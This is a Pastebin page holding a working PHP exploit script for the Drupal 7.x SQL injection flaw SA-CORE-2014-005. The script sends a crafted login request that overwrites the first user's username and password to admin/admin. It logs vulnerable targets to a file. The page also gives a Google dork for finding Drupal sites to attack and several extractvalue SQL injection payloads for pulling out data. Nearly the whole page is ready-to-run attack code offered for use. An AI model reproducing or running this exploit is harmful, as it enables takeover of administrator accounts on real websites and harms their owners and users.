Googleinurl

[EXPLOIT] Drupal 7.x SQL Injection / INURL - BRASIL

Feb 7th, 2015
3,742
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /* Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
  4.   ----------------------------------------------------------
  5.  * Drupal 7 SQL Injection vulnerability demo
  6.  * Read more at http://milankragujevic.com/post/66
  7.  * This will change the first user's username to admin
  8.  * and their password to admin
  9.  * Change $url to the website URL
  10.   ----------------------------------------------------------
  11.  * EXTRA INFO:
  12.  * http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
  13.  * http://pastebin.com/nDwLFV3v
  14.  * https://www.youtube.com/watch?v=rHwJYD_yTlM
  15.  * DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
  16.   ----------------------------------------------------------
  17.  * Script exploit developed by INURL - BRAZIL
  18.  * AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  19.  * EMAIL*: inurllbr@gmail.com
  20.  * Blog*: http://blog.inurl.com.br
  21.  * Twitter*: https://twitter.com/googleinurl
  22.  * Fanpage*: https://fb.com/InurlBrasil
  23.  * GIT*: https://github.com/googleinurl
  24.  * YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  25.  * PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  26.   ----------------------------------------------------------
  27.  *
  28.  * DORK: " Powered by Drupal" inurl:"user/register"
  29.  *
  30.  */
  31.  
  32. error_reporting(1);
  33. set_time_limit(0);
  34. ini_set('display_errors', 1);
  35. ini_set('max_execution_time', 0);
  36. ini_set('allow_url_fopen', 1);
  37. ob_implicit_flush(true);
  38. ob_end_flush();
  39. //echo '<pre>';
  40.  
  41. $params['url'] = isset($argv[1]) && !empty($argv[1]) ? $argv[1] : exit("SET TARGET URL ex: php exploitDrupal7.php http://target.com save.txt");
  42. $params['output'] = isset($argv[2]) && !empty($argv[2]) ? $argv[2] : 'OUTPUT_INURL_DRUPAL7.txt';
  43. $params['post'] = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  44. $params['url_request'] = '?q=node&destination=node';
  45.  
  46.  
  47. //EXEMPLE INJECTIONS - http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html
  48. //
  49. //users passwords:
  50. $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  51.  
  52. //select information_schema.tables:
  53. $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select md5(1122) from
  54. information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed&
  55. removed=removed&form_build_id=&form_id=user_login_block&op=Log+in";
  56.  
  57. function __request($params) {
  58.  
  59.     $objcurl = curl_init();
  60.     curl_setopt($objcurl, CURLOPT_URL, $params['url'] . $params['url_request']);
  61.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  62.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  63.     curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
  64.         'Content-Type: application/x-www-form-urlencoded',
  65.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  66.         'Accept: application/json, text/javascript, */*; q=0.01',
  67.         'X-Requested-With: XMLHttpRequest',
  68.         "Referer: {$params['url']}",
  69.         'Accept-Language: en-US,en;q=0.5',
  70.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  71.     ));
  72.     curl_setopt($objcurl, CURLOPT_REFERER, $params['url'] . $params['url_request']);
  73.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);
  74.  
  75.     $corpo = curl_exec($objcurl);
  76.     curl_close($objcurl);
  77.  
  78.     if (stristr($corpo, 'mb_strlen() expects parameter 1 to be string') && $corpo) {
  79.         echo "[INFO]: VULNERABLE! Log in with username \"admin\" and password \"admin\" at {$params['url']}/user/login \n";
  80.         echo "[INFO][OUTPUT]: {$params['output']}\n";
  81.         $output = "-------------------------------------\n";
  82.         $output.= "[INFO][URL]: {$params['url']}/user/login\n";
  83.         $output.= "[INFO][LOGIN]: admin / pass: admin\n";
  84.         $output.= "[INFO][DATE]: " . date("d-m-Y H:i:s");
  85.         $output.= "\n-------------------------------------\n\n";
  86.         echo $output;
  87.         file_put_contents($params['output'], $output, FILE_APPEND);
  88.     } else {
  89.         echo "[INFO]: NOT Vulnerable , or your Internet isn't working. \n\n";
  90.     }
  91. }
  92.  
  93. //EXECUT...
  94. __request($params);
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×